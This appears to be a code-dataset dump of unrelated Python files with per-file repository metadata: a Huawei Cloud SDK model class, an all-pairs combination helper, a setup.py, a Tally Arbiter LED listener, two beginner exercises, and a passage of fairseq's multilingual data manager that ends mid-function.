User-defined key/value pairs. > Note: > > - At most 10 key/value pairs can be injected. > - A key can contain only uppercase letters (A-Z), lowercase letters (a-z), digits (0-9), hyphens (-), underscores (_), colons (:) and periods (.), and must be 1 to 255 characters long. > - A value can be at most 255 characters long. Reserved system fields: 1. op_svc_userid: user ID. Required when chargingMode in the extendparam structure is prePaid (a yearly/monthly ECS) and SSH key login is used. 2. agency_name: name of the agency. An agency is created by the tenant administrator in Identity and Access Management (IAM) and provides the ECS with temporary credentials for accessing cloud services. > Note: > > To obtain or update the agency: > > 1. Use the IAM [Querying an Agency List](https://support.huaweicloud.com/api-iam/zh-cn_topic_0079467614.html) API to obtain the name of a valid agency. > 2. Use the [Updating ECS Metadata](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0025560298.html) API to set the agency_name field in metadata to the new agency name.
:return: The metadata of this PrePaidServer.
:rtype: dict(str, str)
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this PrePaidServer.
User-defined key/value pairs. > Note: > > - At most 10 key/value pairs can be injected. > - A key can contain only uppercase letters (A-Z), lowercase letters (a-z), digits (0-9), hyphens (-), underscores (_), colons (:) and periods (.), and must be 1 to 255 characters long. > - A value can be at most 255 characters long. Reserved system fields: 1. op_svc_userid: user ID. Required when chargingMode in the extendparam structure is prePaid (a yearly/monthly ECS) and SSH key login is used. 2. agency_name: name of the agency. An agency is created by the tenant administrator in Identity and Access Management (IAM) and provides the ECS with temporary credentials for accessing cloud services. > Note: > > To obtain or update the agency: > > 1. Use the IAM [Querying an Agency List](https://support.huaweicloud.com/api-iam/zh-cn_topic_0079467614.html) API to obtain the name of a valid agency. > 2. Use the [Updating ECS Metadata](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0025560298.html) API to set the agency_name field in metadata to the new agency name.
:param metadata: The metadata of this PrePaidServer.
:type: dict(str, str)
"""
self._metadata = metadata
@property
def osscheduler_hints(self):
"""Gets the osscheduler_hints of this PrePaidServer.
:return: The osscheduler_hints of this PrePaidServer.
:rtype: PrePaidServerSchedulerHints
"""
return self._osscheduler_hints
@osscheduler_hints.setter
def osscheduler_hints(self, osscheduler_hints):
"""Sets the osscheduler_hints of this PrePaidServer.
:param osscheduler_hints: The osscheduler_hints of this PrePaidServer.
:type: PrePaidServerSchedulerHints
"""
self._osscheduler_hints = osscheduler_hints
@property
def tags(self):
"""Gets the tags of this PrePaidServer.
Tags of the ECS. A tag has the format 'key.value', where the key is at most 36 characters long and the value at most 43 characters. Naming requirements: - A tag key can contain only uppercase letters (A-Z), lowercase letters (a-z), digits (0-9), underscores (_), hyphens (-) and Chinese characters. - A tag value can contain only uppercase letters (A-Z), lowercase letters (a-z), digits (0-9), underscores (_), hyphens (-), periods (.) and Chinese characters. > Note: > > At most 10 tags can be added to an ECS at creation time. > The public cloud has added the server_tags field, which serves the same purpose as tags but supports a wider range of keys and values; using server_tags is recommended.
:return: The tags of this PrePaidServer.
:rtype: list[str]
"""
return self._tags
@tags.setter
def tags(self, tags):
"""Sets the tags of this PrePaidServer.
Tags of the ECS. A tag has the format 'key.value', where the key is at most 36 characters long and the value at most 43 characters. Naming requirements: - A tag key can contain only uppercase letters (A-Z), lowercase letters (a-z), digits (0-9), underscores (_), hyphens (-) and Chinese characters. - A tag value can contain only uppercase letters (A-Z), lowercase letters (a-z), digits (0-9), underscores (_), hyphens (-), periods (.) and Chinese characters. > Note: > > At most 10 tags can be added to an ECS at creation time. > The public cloud has added the server_tags field, which serves the same purpose as tags but supports a wider range of keys and values; using server_tags is recommended.
:param tags: The tags of this PrePaidServer.
:type: list[str]
"""
self._tags = tags
@property
def server_tags(self):
"""Gets the server_tags of this PrePaidServer.
Tags of the ECS. > Note: > > At most 10 tags can be added to an ECS at creation time. > The public cloud has added the server_tags field, which serves the same purpose as tags but supports a wider range of keys and values; using server_tags is recommended.
:return: The server_tags of this PrePaidServer.
:rtype: list[PrePaidServerTag]
"""
return self._server_tags
@server_tags.setter
def server_tags(self, server_tags):
"""Sets the server_tags of this PrePaidServer.
Tags of the ECS. > Note: > > At most 10 tags can be added to an ECS at creation time. > The public cloud has added the server_tags field, which serves the same purpose as tags but supports a wider range of keys and values; using server_tags is recommended.
:param server_tags: The server_tags of this PrePaidServer.
:type: list[PrePaidServerTag]
"""
self._server_tags = server_tags
@property
def description(self):
"""Gets the description of this PrePaidServer.
Description of the ECS; defaults to an empty string. - At most 85 characters long. - Must not contain '<' or '>'.
:return: The description of this PrePaidServer.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this PrePaidServer.
Description of the ECS; defaults to an empty string. - At most 85 characters long. - Must not contain '<' or '>'.
:param description: The description of this PrePaidServer.
:type: str
"""
self._description = description
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PrePaidServer):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
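# Illustrative sketch (not part of the generated SDK module): constructing a minimal
# PrePaidServer request body. Every ID, name and flavor below is a placeholder chosen
# for the example, not a real resource.
if __name__ == "__main__":
    example = PrePaidServer(
        image_ref="11111111-2222-3333-4444-555555555555",  # placeholder image UUID
        flavor_ref="s6.small.1",                           # placeholder flavor ID
        name="demo-ecs",
        vpcid="66666666-7777-8888-9999-000000000000",      # placeholder VPC UUID
        nics=[],                                           # would normally hold PrePaidServerNic objects
        root_volume=None,                                  # would normally be a PrePaidServerRootVolume
        availability_zone="region-1a",                     # placeholder AZ name
        count=1,
    )
    print(example.to_str())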
| 34.921569
| 659
| 0.640997
|
8de0329cabd5381847968b902106f09429be5fd6
| 1,715
|
py
|
Python
|
allpairspy/pairs_storage.py
|
pavelicii/allpairspy
|
bfba15ff92de53c5e96edde77be39228b785af83
|
[
"MIT"
] | 184
|
2017-05-08T01:06:58.000Z
|
2022-03-25T06:36:40.000Z
|
allpairspy/pairs_storage.py
|
zgq346712481/allpairspy
|
e15ac03234e41f420a90767763f4cc0ae14d575e
|
[
"MIT"
] | 10
|
2017-07-04T15:19:54.000Z
|
2022-03-20T10:21:43.000Z
|
allpairspy/pairs_storage.py
|
zgq346712481/allpairspy
|
e15ac03234e41f420a90767763f4cc0ae14d575e
|
[
"MIT"
] | 37
|
2018-06-07T14:20:31.000Z
|
2022-03-12T01:38:30.000Z
|
from itertools import combinations
class Node:
@property
def id(self):
return self.__node_id
@property
def counter(self):
return self.__counter
def __init__(self, node_id):
self.__node_id = node_id
self.__counter = 0
self.in_ = set()
self.out = set()
def __str__(self):
return str(self.__dict__)
def inc_counter(self):
self.__counter += 1
key_cache = {}
def key(items):
if items in key_cache:
return key_cache[items]
key_value = tuple([x.id for x in items])
key_cache[items] = key_value
return key_value
class PairsStorage:
def __init__(self, n):
self.__n = n
self.__nodes = {}
self.__combs_arr = [set() for _i in range(n)]
def __len__(self):
return len(self.__combs_arr[-1])
def add_sequence(self, sequence):
for i in range(1, self.__n + 1):
for combination in combinations(sequence, i):
self.__add_combination(combination)
def get_node_info(self, item):
return self.__nodes.get(item.id, Node(item.id))
def get_combs(self):
return self.__combs_arr
def __add_combination(self, combination):
n = len(combination)
assert n > 0
self.__combs_arr[n - 1].add(key(combination))
if n == 1 and combination[0].id not in self.__nodes:
self.__nodes[combination[0].id] = Node(combination[0].id)
return
ids = [x.id for x in combination]
for i, id in enumerate(ids):
curr = self.__nodes[id]
curr.inc_counter()
curr.in_.update(ids[:i])
curr.out.update(ids[i + 1 :])
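# Illustrative sketch (not part of the original module): PairsStorage expects sequences of
# objects exposing an .id attribute, such as the Node class above. The items below are made
# up for the example.
if __name__ == "__main__":
    a, b, c = Node("a"), Node("b"), Node("c")
    storage = PairsStorage(2)        # track all 1- and 2-element combinations
    storage.add_sequence((a, b, c))
    print(len(storage))              # number of distinct pairs seen -> 3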
| 23.175676
| 69
| 0.587172
|
a1b8a52a7bdbb8c1f5b121abedceed4f8c6b3a5e
| 1,195
|
py
|
Python
|
setup.py
|
huashen218/pytorch-ialgebra
|
f498fb2c91c5a48204c66ad5e6dc118cbec69641
|
[
"MIT"
] | 2
|
2021-02-01T20:07:13.000Z
|
2021-02-10T17:15:45.000Z
|
setup.py
|
huashen218/pytorch-ialgebra
|
f498fb2c91c5a48204c66ad5e6dc118cbec69641
|
[
"MIT"
] | null | null | null |
setup.py
|
huashen218/pytorch-ialgebra
|
f498fb2c91c5a48204c66ad5e6dc118cbec69641
|
[
"MIT"
] | null | null | null |
"""A setuptools based setup module."""
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='pytorch-ialgebra',
version=open('VERSION').readline(),
description='interactive interpretation for deep learning models',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
author='',
author_email='', # Optional
keywords='interactive interpretation for deep learning models',
packages=[
'ialgebra',
'ialgebra.interpreters',
'ialgebra.models',
'ialgebra.operations',
'ialgebra.utils',
],
    python_requires='>=3.0',
    install_requires=[
        # standard-library modules (argparse, os, sys, threading, webbrowser,
        # collections, http.server) are always available and are not pip-installable
        'pyyaml',
        'numpy',
        'tqdm',
        'opencv-python',  # imported as cv2
        'torch',
        'torchvision',
        'matplotlib',
        'visdom',
    ],
    url='https://pypi.org/project/pytorch-ialgebra/',
)
| 25.425532
| 71
| 0.593305
|
2f5ddb06afc557aacab032eacb19924df4aa74da
| 5,542
|
py
|
Python
|
tallyarbiter-ws281xlistener.py
|
5pm-HDH/TallyArbiter-WS28xxListener
|
6a6a5cd0718aa3add5b58299d9f95d1a99eb92ad
|
[
"MIT"
] | null | null | null |
tallyarbiter-ws281xlistener.py
|
5pm-HDH/TallyArbiter-WS28xxListener
|
6a6a5cd0718aa3add5b58299d9f95d1a99eb92ad
|
[
"MIT"
] | null | null | null |
tallyarbiter-ws281xlistener.py
|
5pm-HDH/TallyArbiter-WS28xxListener
|
6a6a5cd0718aa3add5b58299d9f95d1a99eb92ad
|
[
"MIT"
] | null | null | null |
## Tally Arbiter Python Listener
from signal import signal, SIGINT
from sys import exit
import sys
import time
from rpi_ws281x import PixelStrip, Color
import socketio
import json
device_states = []
bus_options = []
mode_preview = False
mode_program = False
if len(sys.argv) > 1:
configFileName = sys.argv[1]
else:
configFileName = 'config_ws281x.json'
server_config = {}
led_config = {}
# SocketIO Connections
sio = socketio.Client()
@sio.event
def connect():
print('Connected to Tally Arbiter server:', server_config["ip"], server_config["port"])
sio.emit('bus_options') # get current bus options
sio.emit('device_listen_blink', {'deviceId': led_config["deviceId"]}) # start listening for the device
repeatNumber = 2
while (repeatNumber):
repeatNumber = repeatNumber - 1
doBlink(0, 255, 0)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.event
def connect_error(data):
print('Unable to connect to Tally Arbiter server:', server_config["ip"], server_config["port"])
doBlink(150, 150, 150)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.event
def disconnect():
print('Disconnected from Tally Arbiter server:', server_config["ip"], server_config["port"])
doBlink(255, 255, 255)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.event
def reconnect():
print('Reconnected to Tally Arbiter server:', server_config["ip"], server_config["port"])
repeatNumber = 2
while (repeatNumber):
repeatNumber = repeatNumber - 1
doBlink(0, 255, 0)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.on('device_states')
def on_device_states(data):
global device_states
device_states = data
processTallyData()
@sio.on('bus_options')
def on_bus_options(data):
global bus_options
bus_options = data
@sio.on('flash')
def on_flash():
doBlink(255, 255, 255)
time.sleep(.5)
doBlink(0, 0, 0)
time.sleep(.5)
doBlink(255, 255, 255)
time.sleep(.5)
doBlink(0, 0, 0)
time.sleep(.5)
doBlink(255, 255, 255)
time.sleep(.5)
evaluateMode()
@sio.on('reassign')
def on_reassign(oldDeviceId, newDeviceId):
print('Reassigning from DeviceID: ' + oldDeviceId + ' to Device ID: ' + newDeviceId)
doBlink(0, 0, 0)
time.sleep(.1)
doBlink(0, 0, 255)
time.sleep(.1)
doBlink(0, 0, 0)
time.sleep(.1)
doBlink(0, 0, 255)
time.sleep(.1)
doBlink(0, 0, 0)
sio.emit('listener_reassign', data=(oldDeviceId, newDeviceId))
led_config["deviceId"] = newDeviceId
config_file = open(configFileName, 'w')
configJson = {}
configJson['server_config'] = server_config
configJson['led_config'] = led_config
config_file.write(json.dumps(configJson, indent=4))
config_file.close()
def getBusTypeById(busId):
for bus in bus_options:
if bus['id'] == busId:
return bus['type']
def processTallyData():
global mode_preview
global mode_program
for device_state in device_states:
if getBusTypeById(device_state['busId']) == 'preview':
if len(device_state['sources']) > 0:
mode_preview = True
else:
mode_preview = False
elif getBusTypeById(device_state['busId']) == 'program':
if len(device_state['sources']) > 0:
mode_program = True
else:
mode_program = False
evaluateMode()
def evaluateMode():
if (mode_preview == True) and (mode_program == False): # preview mode, color it green
doBlink(0, 255, 0)
elif (mode_preview == False) and (mode_program == True): # program mode, color it red
doBlink(255, 0, 0)
elif (mode_preview == True) and (mode_program == True): # preview+program mode, color it yellow
doBlink(255, 127, 0)
else: # no source, turn it off
doBlink(0, 0, 0)
def doBlink(r, g, b):
color = Color(r, g, b)
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
time.sleep(100.0 / 1000.0)
try:
config_file = open(configFileName)
config = config_file.read()
config_file.close()
if config != '':
configJson = json.loads(config)
server_config = configJson['server_config']
led_config = configJson['led_config']
else:
print('Config data could not be loaded.')
exit(0)
except IOError:
print('Config file could not be located.')
exit(0)
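# Illustrative sketch (not part of the original listener): the shape of config_ws281x.json
# implied by the reads above. Every value below is a placeholder guess, not an official
# template shipped with TallyArbiter.
def write_example_config(path='config_ws281x.example.json'):
    example = {
        'server_config': {'ip': '192.168.1.50', 'port': 4455},
        'led_config': {
            'deviceId': 'unassigned',
            'LED_COUNT': 12, 'LED_PIN': 18, 'LED_FREQ_HZ': 800000,
            'LED_DMA': 10, 'LED_INVERT': False, 'LED_BRIGHTNESS': 255, 'LED_CHANNEL': 0,
        },
    }
    with open(path, 'w') as f:
        f.write(json.dumps(example, indent=4))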
# Initialize the library (must be called once before other functions).
strip = PixelStrip(led_config["LED_COUNT"], led_config["LED_PIN"], led_config["LED_FREQ_HZ"], led_config["LED_DMA"],
led_config["LED_INVERT"], led_config["LED_BRIGHTNESS"], led_config["LED_CHANNEL"])
strip.begin()
while 1:
try:
        print('Tally Arbiter Listener Running. Press CTRL-C to exit.')
        print(
            'Attempting to connect to Tally Arbiter server: ' + server_config["ip"] + '(' + str(server_config["port"]) + ')')
        sio.connect('http://' + server_config["ip"] + ':' + str(server_config["port"]))
        sio.wait()
except KeyboardInterrupt:
print('Exiting Tally Arbiter Listener.')
doBlink(0, 0, 0)
exit(0)
except socketio.exceptions.ConnectionError:
doBlink(0, 0, 0)
time.sleep(15)
except:
print("Unexpected error:", sys.exc_info()[0])
print('An error occurred internally.')
doBlink(0, 0, 0)
| 27.300493
| 125
| 0.628834
|
6a635aecb7c44bde0c9cd46f75fa322a4715d38c
| 741
|
py
|
Python
|
python/Basic-Algorith-Scripting/whereDoIBelong.py
|
stricoff92/freecodecamp-challenges
|
5f0012fc27edfe7d4855269e18c1b9bb82fe1f4a
|
[
"MIT"
] | null | null | null |
python/Basic-Algorith-Scripting/whereDoIBelong.py
|
stricoff92/freecodecamp-challenges
|
5f0012fc27edfe7d4855269e18c1b9bb82fe1f4a
|
[
"MIT"
] | 1
|
2018-09-28T01:34:46.000Z
|
2018-09-28T01:34:46.000Z
|
python/Basic-Algorith-Scripting/whereDoIBelong.py
|
stricoff92/freecodecamp-challenges
|
5f0012fc27edfe7d4855269e18c1b9bb82fe1f4a
|
[
"MIT"
] | null | null | null |
'''
Return the lowest index at which a value (second argument) should be inserted into an array (first argument) once it has been sorted.
The returned value should be a number.
For example, getIndexToIns([1,2,3,4], 1.5) should return 1 because it is greater than 1 (index 0), but less than 2 (index 1).
Likewise, getIndexToIns([20,3,5], 19) should return 2 because once the array has been sorted it will look like [3,5,20] and 19 is less than 20 (index 2) and greater than 5 (index 1).
'''
def getIndexToIns(arr, num):
# Count the number of arr elements that are less than num.
# That's the index where num would fit in an array sorted small to large.
return sum(v<num for v in arr)
getIndexToIns([40, 60], 50)
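# A few additional checks of the behaviour described in the docstring
# (illustrative only, not part of the original exercise file):
assert getIndexToIns([1, 2, 3, 4], 1.5) == 1   # 1.5 sorts between 1 and 2
assert getIndexToIns([20, 3, 5], 19) == 2      # sorted -> [3, 5, 20], 19 goes before 20
assert getIndexToIns([40, 60], 50) == 1        # the call above returns 1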
| 33.681818
| 182
| 0.707152
|
ea7f608ce9bf16bf51c10a9d7349923bb6cc9fe1
| 312
|
py
|
Python
|
ex035.py
|
Roninho514/Treinamento-Python
|
fc6ad0b64fb3dc3cfa5381f8fc53b5b3243a7ff6
|
[
"MIT"
] | null | null | null |
ex035.py
|
Roninho514/Treinamento-Python
|
fc6ad0b64fb3dc3cfa5381f8fc53b5b3243a7ff6
|
[
"MIT"
] | null | null | null |
ex035.py
|
Roninho514/Treinamento-Python
|
fc6ad0b64fb3dc3cfa5381f8fc53b5b3243a7ff6
|
[
"MIT"
] | null | null | null |
r1 = float(input('Enter the first segment: '))
r2 = float(input('Enter the second segment: '))
r3 = float(input('Enter the third segment: '))
if r1 < r2 + r3 and r2 < r1 + r3 and r3 < r1 + r2:
    print('These segments can form a triangle')
else:
    print('These segments cannot form a triangle')
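# Worked example (illustrative, not part of the original exercise): the same
# triangle-inequality check wrapped in a reusable function with two sample inputs.
def can_form_triangle(a, b, c):
    # Each side must be shorter than the sum of the other two.
    return a < b + c and b < a + c and c < a + b

assert can_form_triangle(4.0, 5.0, 6.0) is True      # 4 < 11, 5 < 10, 6 < 9
assert can_form_triangle(1.0, 2.0, 10.0) is False    # 10 is not less than 3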
| 44.571429
| 58
| 0.701923
|
0cee405d5798c41a7202eef2675d23b80c544f14
| 45,597
|
py
|
Python
|
fairseq/data/multilingual/multilingual_data_manager.py
|
ahmetustun/fairseq
|
5ec791d95476beaa1513da14efa9035337bf6a15
|
[
"MIT"
] | null | null | null |
fairseq/data/multilingual/multilingual_data_manager.py
|
ahmetustun/fairseq
|
5ec791d95476beaa1513da14efa9035337bf6a15
|
[
"MIT"
] | null | null | null |
fairseq/data/multilingual/multilingual_data_manager.py
|
ahmetustun/fairseq
|
5ec791d95476beaa1513da14efa9035337bf6a15
|
[
"MIT"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import itertools
import json
import logging
import math
import os
from collections import OrderedDict, defaultdict
from fairseq import utils
from fairseq.data import (
AppendTokenDataset,
ConcatDataset,
Dictionary,
LanguagePairDataset,
PrependTokenDataset,
SampledMultiDataset,
SampledMultiEpochDataset,
StripTokenDataset,
TransformEosLangPairDataset,
TruncateDataset,
data_utils,
indexed_dataset,
)
from fairseq.data.multilingual.multilingual_utils import (
EncoderLangtok,
LangTokSpec,
LangTokStyle,
augment_dictionary,
get_lang_tok,
)
from fairseq.data.multilingual.sampled_multi_dataset import CollateFormat
from fairseq.data.prefix_token_dataset import PrefixTokenDataset
from fairseq.file_io import PathManager
from fairseq.utils import FileContentsAction, csv_str_list, eval_str_dict
logger = logging.getLogger(__name__)
SRC_DICT_NAME = 'src'
TGT_DICT_NAME = 'tgt'
def _lang_id(dic: Dictionary, lang: str):
"""Return language ID index."""
idx = dic.index(lang)
assert idx != dic.unk_index, "cannot find language ID for lang {}".format(lang)
return idx
def load_sampling_weights(from_file):
with open(from_file) as f:
weights = json.load(f)
return weights
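# Illustrative sketch (not part of the original module): the file read by
# load_sampling_weights() is a plain JSON object mapping "<data_category>:<src>-<tgt>"
# keys to float weights, matching the format documented for --sampling-weights-from-file
# below. The concrete keys, values and file name are made up for the example.
def _example_sampling_weights(path="sampling_weights.example.json"):
    with open(path, "w") as f:
        json.dump({"main:en_XX-es_XX": 0.2, "mined:en_XX-pt_XX": 0.5}, f)
    return load_sampling_weights(path)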
class MultilingualDatasetManager(object):
def __init__(self, args, lang_pairs, langs, dicts, sampling_method):
super().__init__()
self.args = args
self.seed = args.seed
self.lang_pairs = lang_pairs
self.extra_lang_pairs = (
list(
{p for _, v in args.extra_lang_pairs.items() for p in v.split(",")}
)
if args.extra_lang_pairs
else []
)
self.src_langs = {p.split("-")[0] for p in args.lang_pairs + self.extra_lang_pairs}
self.tgt_langs = {p.split("-")[1] for p in args.lang_pairs + self.extra_lang_pairs}
self.langs = langs
self.dicts = dicts
self.lang_dict = self.create_lang_dictionary(self.langs)
self.sampling_method = sampling_method
self.sampling_scheduler = None
self._has_sharded_data = False
self._num_shards_dict = {}
self._training_data_sizes = defaultdict(lambda: {})
@classmethod
def setup_data_manager(cls, args, lang_pairs, langs, dicts, sampling_method):
return MultilingualDatasetManager(
args, lang_pairs, langs, dicts, sampling_method
)
@staticmethod
def add_args(parser):
parser.add_argument(
"data",
help="colon separated path to data directories list, \
will be iterated upon during epochs in round-robin manner",
action=FileContentsAction,
)
parser.add_argument(
"--langs",
default=None,
type=csv_str_list,
help="a list of languages comma sperated languages which can appear in lang-pairs; "
"note that the ordering determines language token IDs",
)
parser.add_argument(
"--lang-dict",
default=None,
type=str,
help="an external file which contains a list of "
"languages which can appear in lang-pairs; "
"note that the ordering determines language token IDs; "
"--langs and --lang-dict are two exclusive options",
)
parser.add_argument('--source-dict', default=None, type=str,
help='path to source dictionary; if specified it will override per language dictionary loading')
parser.add_argument('--target-dict', default=None, type=str,
help='path to target dictionary; if specified it will override per language dictionary loading')
parser.add_argument(
"--lang-tok-style",
default=LangTokStyle.multilingual.value,
type=str,
choices=[LangTokStyle.multilingual.value, LangTokStyle.mbart.value],
help="language token styles",
)
parser.add_argument(
"--load-alignments",
action="store_true",
help="load the binarized alignments",
)
parser.add_argument(
"--left-pad-source",
default="True",
type=str,
metavar="BOOL",
help="pad the source on the left",
)
parser.add_argument(
"--left-pad-target",
default="False",
type=str,
metavar="BOOL",
help="pad the target on the left",
)
parser.add_argument(
"--max-source-positions",
default=1024,
type=int,
metavar="N",
help="max number of tokens in the source sequence",
)
parser.add_argument(
"--max-target-positions",
default=1024,
type=int,
metavar="N",
help="max number of tokens in the target sequence",
)
parser.add_argument(
"--upsample-primary",
default=1,
type=int,
help="amount to upsample primary dataset",
)
parser.add_argument(
"--truncate-source",
action="store_true",
default=False,
help="truncate source to max-source-positions",
)
parser.add_argument(
"--encoder-langtok",
default=None,
type=str,
choices=[EncoderLangtok.src.value, EncoderLangtok.tgt.value],
metavar="SRCTGT",
help="prepend to the beginning of source sentence the source or target "
"language token. (src/tgt)",
)
parser.add_argument(
"--decoder-langtok",
action="store_true",
help="prepend to the beginning of target sentence the target language token",
)
parser.add_argument(
"--lang-tok-replacing-bos-eos", action="store_true", default=False
)
parser.add_argument(
"--enable-lang-ids",
default=False,
action="store_true",
help="whether to include language IDs in samples",
)
parser.add_argument(
"--enable-reservsed-directions-shared-datasets",
default=False,
action="store_true",
help="whether to allow datasets be used in reversed directions",
)
parser.add_argument(
"--extra-data",
help='a dictionary of data name to this path, \
e.g. {"mined", path_to_mined_data, "denoised": path_to_denoised_data}',
type=lambda uf: eval_str_dict(uf, type=str),
default=None,
)
parser.add_argument(
"--extra-lang-pairs",
help='a dictionary of data name to the language pairs they serve, \
e.g. {"mined": comma-separated-lang-pairs, "denoised": comma-separated-lang-pairs}',
type=lambda uf: eval_str_dict(uf, type=str),
default=None,
)
parser.add_argument(
"--fixed-dictionary",
help="Fixed dictionary to use with model path",
default=None,
type=str,
)
parser.add_argument(
"--langtoks-specs",
help='a list of comma separated data types that a set of language tokens to be specialized for, \
e.g. "main,dae,mined". There will be a set of language tokens added to the vocab to \
distinguish languages in different training data types. If not specified, default language \
tokens per languages will be added',
default=LangTokSpec.main.value,
type=csv_str_list,
)
parser.add_argument(
"--langtoks",
help='a dictionary of how to add language tokens, \
e.g. {"mined": (None, "tgt"), "mono_dae": ("src.dae", "tgt"), "main": \
("src", "tgt")}, or {"mined": ("src.mined", "tgt")}',
default=None,
type=lambda uf: eval_str_dict(uf, type=str),
)
parser.add_argument(
"--sampling-weights-from-file",
help='a file contain a python dictionary of how to sample data sets, \
e.g. { "main:en_XX-es_XX": 0.2, "mined:en_XX-pt_XX": 0.5, \
"mono_dae:es_XX-es_XX: 0.3, "main:en_xx-fr_XX": 0.8 }',
default=None,
type=str,
)
parser.add_argument(
"--sampling-weights",
help='a dictionary of how to sample data sets, \
e.g. { "main:en_XX-es_XX": 0.2, "mined:en_XX-pt_XX": 0.5, \
"mono_dae:es_XX-es_XX: 0.3, "main:en_xx-fr_XX": 0.8 }',
default=None,
type=lambda uf: eval_str_dict(uf, type=str),
)
parser.add_argument(
"--virtual-epoch-size",
default=None,
type=int,
help="virtual epoch size to speed up data loading",
)
parser.add_argument(
"--virtual-data-size",
default=None,
type=int,
help="virtual data size of the whole joint dataset to speed"
"up data loading and have specific dynamic sampling strategy interval",
)
@classmethod
def load_langs(cls, args, **kwargs):
if args.lang_dict and args.langs:
raise ValueError("--langs and --lang-dict can not both be specified")
if args.lang_dict is None and args.langs is None:
logger.warning(
"External language dictionary is not provided; "
"use lang-pairs to infer the set of supported languages. "
"The language ordering is not stable which might cause "
"misalignment in pretraining and finetuning."
)
# infer from lang_pairs as it is
langs = list(
{x for lang_pair in args.lang_pairs for x in lang_pair.split("-")}
)
langs = sorted(langs)
logger.info(f"inferred language list: {langs}")
elif args.lang_dict:
with open(
PathManager.get_local_path(args.lang_dict), "r", encoding="utf-8"
) as f:
langs = [lang.strip() for lang in f.readlines() if lang.strip()]
logger.info(
f"loaded language list from {args.lang_dict} as they are ordered in file"
)
elif args.langs:
langs = args.langs
logger.info(
f"parsed the language list as they are ordered in the option: {langs}"
)
return langs
def has_sharded_data(self, split):
return self._has_sharded_data and split == getattr(
self.args, "train_subset", None
)
def _shared_collater(self):
return not (self.args.extra_data and "mono_dae" in self.args.extra_data) and (
not self.args.lang_tok_replacing_bos_eos
)
def estimate_global_pass_epoch(self, epoch):
if self.args.virtual_epoch_size is None or self.args.virtual_data_size is None:
return None
# one epoch more for remaining data in each shard
virtual_epochs_per_shard = math.ceil(
self.args.virtual_data_size / self.args.virtual_epoch_size
)
# note that fairseq epoch / shard_epoch starts from 1
shard_epoch = (epoch - 1) // virtual_epochs_per_shard + 1
return shard_epoch
@classmethod
def prepare(cls, load_dictionary, args, **kargs):
args.left_pad_source = utils.eval_bool(args.left_pad_source)
args.left_pad_target = utils.eval_bool(args.left_pad_target)
if not hasattr(args, "shuffle_instance"):
args.shuffle_instance = False
if args.langtoks is None:
args.langtoks = {}
if "main" not in args.langtoks:
src_langtok_spec = args.encoder_langtok if args.encoder_langtok else None
tgt_langtok_spec = "tgt" if args.decoder_langtok else None
args.langtoks["main"] = (src_langtok_spec, tgt_langtok_spec)
def check_langs(langs, pairs):
messages = []
for src, tgt in pairs:
if src not in langs or tgt not in langs:
messages.append(
f"language pair {src}-{tgt} contains languages "
"that are not in the language dictionary"
)
if len(messages) > 0:
raise ValueError(" ".join(messages) + f"; langs: {langs}")
if args.lang_pairs is None:
raise ValueError(
"--lang-pairs is required. List all the language pairs in the training objective."
)
if isinstance(args.lang_pairs, str):
args.lang_pairs = args.lang_pairs.split(",")
if args.source_lang is not None or args.target_lang is not None:
training = False
else:
training = True
language_list = cls.load_langs(args, **kargs)
check_langs(
language_list,
(
[p.split("-") for p in args.lang_pairs]
if training
else [(args.source_lang, args.target_lang)]
),
)
def load_dictionary_and_postproc(path):
d = load_dictionary(path)
augment_dictionary(
dictionary=d,
language_list=language_list,
lang_tok_style=args.lang_tok_style,
langtoks_specs=args.langtoks_specs,
extra_data=args.extra_data,
)
return d
dicts = cls.load_all_dictionaries(args, language_list, load_dictionary_and_postproc, training)
return language_list, dicts, training
@classmethod
def load_all_dictionaries(cls, args, language_list, load_dictionary, training):
dicts = OrderedDict()
if args.source_dict is not None:
dicts[SRC_DICT_NAME] = load_dictionary(args.source_dict)
if args.target_dict is not None:
dicts[TGT_DICT_NAME] = load_dictionary(args.target_dict)
if training:
extra_lang_pairs = (
list(
{p for _, v in args.extra_lang_pairs.items() for p in v.split(",")}
)
if args.extra_lang_pairs
else []
)
src_langs_to_load_dicts = sorted(
{p.split("-")[0] for p in (args.lang_pairs + extra_lang_pairs)}
)
tgt_langs_to_load_dicts = sorted(
{p.split("-")[1] for p in (args.lang_pairs + extra_lang_pairs)}
)
else:
src_langs_to_load_dicts = [args.source_lang]
tgt_langs_to_load_dicts = [args.target_lang]
paths = utils.split_paths(args.data)
assert len(paths) > 0
def load_dicts(langs_to_load_dicts):
for lang in langs_to_load_dicts:
dicts[lang] = load_dictionary(
os.path.join(paths[0], "dict.{}.txt".format(lang))
)
if len(dicts) > 0:
dict0 = next(iter(dicts.values()))
assert dicts[lang].pad() == dict0.pad()
assert dicts[lang].eos() == dict0.eos()
assert dicts[lang].unk() == dict0.unk()
